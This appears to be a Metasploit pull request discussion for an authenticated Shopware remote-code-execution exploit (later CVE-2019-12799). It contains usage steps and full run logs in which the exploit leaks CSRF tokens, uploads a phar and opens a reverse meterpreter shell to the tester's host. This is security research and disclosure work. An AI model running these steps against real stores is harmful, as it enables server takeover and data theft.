Added CVE-2017 18357 - Shopware createInstanceFromNamedArguments PHP Object Instantiation

[stevenseeley]

Background

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6 (currently the latest), 5.5, 5.4, 5.3.

References

• https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/

Notes

• I don't consider this a zero-day because it's a bypass for a patch
• I recommend the CVSS score to be 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

Setup

The following is the exact setup I used to test and analyze the vulnerability:

• Debian GNU/Linux 9 (stretch) x64
• MariaDB latest
• Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo

For installation instructions, please refer to the Shopware installation guide.

Verification

• Install Shopware as noted above
• Install the Metasploit module
• Start msfconsole
• use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
• set payload php/meterpreter/reverse_tcp
• set LHOST x.x.x.x
• set RHOSTS y.y.y.y
• check
• exploit
• Verify that you get a meterpreter session

Example

saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc 
[*] Processing scripts/shopware.rc for ERB directives.
resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (scripts/shopware.rc)> set LHOST 192.168.23.1
LHOST => 192.168.23.1
resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
RHOSTS => 192.168.23.164
resource (scripts/shopware.rc)> set RPORT 8080
RPORT => 8080
resource (scripts/shopware.rc)> check
[+] 192.168.23.164:8080 - The target is vulnerable.
resource (scripts/shopware.rc)> exploit
[*] Started reverse TCP handler on 192.168.23.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
[+] Stage 2 - leaked the webroot: /var/www/html
[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 192.168.23.174
[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
[+] Deleted rguktpcw.php
[+] Deleted image/6b/7e/0c/eiuzuoii.jpg

meterpreter > sysinfo
Computer    : 45835d649528
OS          : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
Meterpreter : php/linux
meterpreter >

[wchen-r7]

Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley !

[stevenseeley]

Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley !

duuuuuude, of course, take your time!

[wchen-r7]

I ran into a little trouble due to a bug but the exploit has been confirmed:

msf5 exploit(multi/http/shopware_createinstancefromnamedarguments_rce) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=1622223ihnauhu7tr6rvo77v1v;
[+] Stage 2 - leaked the web root: /var/www/html/shopware/
[+] Stage 3 - leaked the CSRF token: R5Wl0s547aP33xYEKGeW9BGYH5FVnV
[*] /var/www/html/shopware/media/xyefxbyu.php
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6c/48/67/zkvlolae.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:53290) at 2019-05-17 18:12:47 -0500

meterpreter > 

I can fix that bug and then land it. Thank you for the patience @stevenseeley. Always happy to see your work!

[wchen-r7]

Ok now this output is better:

msf5 exploit(multi/http/shopware_createinstancefromnamedarguments_rce) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=d66oftua6p29p6gt7pma494vbj;
[+] Stage 2 - leaked the web root: /var/www/html/shopware/
[+] Stage 3 - leaked the CSRF token: sSbbewFwfJxeCHL4JHdoqrwb88ku0w
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/5d/b2/5c/okwnopws.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 172.16.135.129
[*] Meterpreter session 2 opened (172.16.135.1:4444 -> 172.16.135.129:53296) at 2019-05-17 18:19:06 -0500
[+] Deleted hjqrkulj.php
[+] Deleted image/5d/b2/5c/okwnopws.jpg

meterpreter > 

Nothing major, it's just I had to make sure the php payload path is normalized:

php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php")

Landing now!

[wchen-r7]

Release Notes

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

[todb-r7]

This vulnerability is a bypass for CVE-2017-18357

So, I had a conversation with some MITRE & CERT folks about this bug, and the consensus landed on that this does seem to describe a new vulnerability after all. Looking at rule CNT1, it's an independently fixable issue, so it looks like the old vuln and this new vuln are, from CVE's perspective, two different vulnerabilities (even though they end up hitting the same codepath). Practically speaking, someone looking at Shopware CVEs from a vuln management perspective may not know that the old patch is insufficient unless and until there's a new CVE that specifically points that out.

I'll take on wrangling that new CVE for @stevenseeley .

[stevenseeley]

CVE-2019-12799